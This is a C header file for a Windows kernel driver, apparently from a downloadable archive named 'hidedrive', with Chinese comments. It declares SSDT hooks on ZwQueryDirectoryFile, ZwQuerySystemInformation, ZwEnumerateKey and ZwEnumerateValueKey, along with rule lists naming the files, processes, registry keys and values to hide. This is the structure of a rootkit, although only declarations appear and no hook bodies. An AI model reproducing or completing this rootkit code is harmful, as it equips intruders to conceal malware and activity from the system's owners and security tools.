www.pudn.com > hidedrive.rar > Cyber02Hide.h
#ifndef _HOOKPORT0123456789_ #define _HOOKPORT0123456789_ #include#include #include #include #include "timeandproc.h" #pragma pack(1) typedef struct ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; //Used only in checked build unsigned int NumberOfServices; unsigned char *ParamTableBase; } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; #pragma pack() __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; /******************************************驱动处理函数********************************************/ //卸载 void DriverUnload(IN PDRIVER_OBJECT DriverObject);//驱动卸载 NTSTATUS DriverIoControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);//驱动控制 //分发 NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp); /******************************************文件隐藏相关********************************************/ typedef struct _FILE_BOTH_DIR_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; CCHAR ShortNameLength; WCHAR ShortName[12]; WCHAR FileName[1]; } FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;//原函数 //申明要Hook的函数 NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile( IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL, IN BOOLEAN bRestartQuery); //定义ZwQueryDirectoryFile的函数指针 typedef NTSTATUS (*REALZWQUERYDIRECTORYFILE)(IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL, IN BOOLEAN bRestartQuery); //定义一个原函数指针 REALZWQUERYDIRECTORYFILE RealZwQueryDirectoryFile; //定义替换API函数的原型 NTSTATUS HookZwQueryDirectoryFile( IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, OUT PVOID FileInformationBuffer, IN ULONG FileInformationBufferLength, IN FILE_INFORMATION_CLASS FileInfoClass, IN BOOLEAN bReturnOnlyOneEntry, IN PUNICODE_STRING PathMask OPTIONAL, IN BOOLEAN bRestartQuery); /*要隐藏的文件名称信息*/ PUCHAR m_FileHideInfo = NULL; /*要隐藏的文件信息个数*/ ULONG m_FileRuleNum = 0; //add by htr on 2005-06-27 //文件隐藏的传递格式 typedef struct _FileHideRule{ char rule[256];//要隐藏的文件名 struct _FileHideRule *_next;//下一项指针 } FILEHIDERULE, *PFILEHIDERULE; //添加和删除文件隐藏规则函数 UCHAR AddFileCtrlInfo(PFILEHIDERULE FileRule); UCHAR DelFileCtrlInfo(PFILEHIDERULE FileRule); /******************************************进程隐藏相关********************************************/ struct _SYSTEM_THREADS { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientIs; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; ULONG ThreadState; KWAIT_REASON WaitReason; }; struct _SYSTEM_PROCESSES { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; struct _SYSTEM_THREADS Threads[1]; }; //申明要Hook的函数 NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformaitonLength, OUT PULONG ReturnLength OPTIONAL); //定义ZwQuerySystemInformation的函数指针 typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)(IN ULONG SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformaitonLength, OUT PULONG ReturnLength OPTIONAL); //定义一个进程查看原函数指针 REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation; //定义替换进程API函数的原型 NTSTATUS HookZwQuerySystemInformation( IN ULONG SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformaitonLength, OUT PULONG ReturnLength OPTIONAL); /*要隐藏的进程名称信息*/ PUCHAR m_ProcessHideInfo = NULL; /*要隐藏的进程信息个数*/ ULONG m_ProcessRuleNum = 0; //add by htr on 2005-06-27 //进程隐藏的传递格式 typedef struct _ProcessHideRule{ char rule[256];//要隐藏的文件名 struct _ProcessHideRule *_next;//下一项指针 } PROCESSHIDERULE, *PPROCESSHIDERULE; //添加和删除进程隐藏规则函数 UCHAR AddProcessCtrlInfo(PPROCESSHIDERULE ProcessRule); UCHAR DelProcessCtrlInfo(PPROCESSHIDERULE ProcessRule); /******************************************注册表项隐藏相关********************************************/ //申明要Hook的函数 NTSYSAPI NTSTATUS NTAPI ZwEnumerateKey( IN HANDLE KeyHandle, IN ULONG Index, IN KEY_INFORMATION_CLASS KeyInformationClass, OUT PVOID KeyInformation, IN ULONG Length, OUT PULONG ResultLength); //定义ZwQuerySystemInformation的函数指针 typedef NTSTATUS (*REALZWENUMERATEKEY)( IN HANDLE KeyHandle, IN ULONG Index, IN KEY_INFORMATION_CLASS KeyInformationClass, OUT PVOID KeyInformation, IN ULONG Length, OUT PULONG ResultLength); //定义一个注册表查看原函数指针 REALZWENUMERATEKEY RealZwEnumerateKey; //定义替换注册表API函数的原型 NTSTATUS HookZwEnumerateKey( IN HANDLE KeyHandle, IN ULONG Index, IN KEY_INFORMATION_CLASS KeyInformationClass, OUT PVOID KeyInformation, IN ULONG Length, OUT PULONG ResultLength); /*要隐藏的注册表名称信息*/ PUCHAR m_KeyHideInfo = NULL; /*要隐藏的注册表信息个数*/ ULONG m_KeyRuleNum = 0; //add by htr on 2005-06-27 /*特定项下存在的要隐藏的注册表名称信息*/ PUCHAR t_KeyHideInfo = NULL; /*特定项下存在的要隐藏的注册表信息个数*/ ULONG t_KeyRuleNum = 0; //add by htr on 2005-06-27 //注册表隐藏的传递格式 typedef struct _KeyHideRule{ char rule[256];//要隐藏的文件名 struct _KeyHideRule *_next;//下一项指针 } KEYHIDERULE, *PKEYHIDERULE; //添加和删除注册表隐藏规则函数 UCHAR AddKeyCtrlInfo(PKEYHIDERULE KeyRule); UCHAR DelKeyCtrlInfo(PKEYHIDERULE KeyRule); /******************************************注册表键值隐藏相关********************************************/ //申明要Hook的函数 NTSYSAPI NTSTATUS ZwEnumerateValueKey( IN HANDLE KeyHandle, IN ULONG Index, IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, OUT PVOID KeyValueInformation, IN ULONG Length, OUT PULONG ResultLength ); //定义ZwQuerySystemInformation的函数指针 typedef NTSTATUS (*REALZWENUMERATEVALUEKEY)( IN HANDLE KeyHandle, IN ULONG Index, IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, OUT PVOID KeyValueInformation, IN ULONG Length, OUT PULONG ResultLength ); //定义一个注册表查看原函数指针 REALZWENUMERATEVALUEKEY RealZwEnumerateValueKey; //定义替换注册表API函数的原型 NTSTATUS HookZwEnumerateValueKey( IN HANDLE KeyHandle, IN ULONG Index, IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, OUT PVOID KeyValueInformation, IN ULONG Length, OUT PULONG ResultLength ); /*要隐藏的注册表名称信息*/ PUCHAR m_ValueHideInfo = NULL; /*要隐藏的注册表信息个数*/ ULONG m_ValueRuleNum = 0; //add by htr on 2005-06-27 //注册表隐藏的传递格式 typedef struct _ValueHideRule{ char rule[256];//要隐藏的文件名 struct _ValueHideRule *_next;//下一项指针 } VALUEHIDERULE, *PVALUEHIDERULE; //添加和删除注册表隐藏规则函数 UCHAR AddValueCtrlInfo(PVALUEHIDERULE ValueRule); UCHAR DelValueCtrlInfo(PVALUEHIDERULE ValueRule); #endif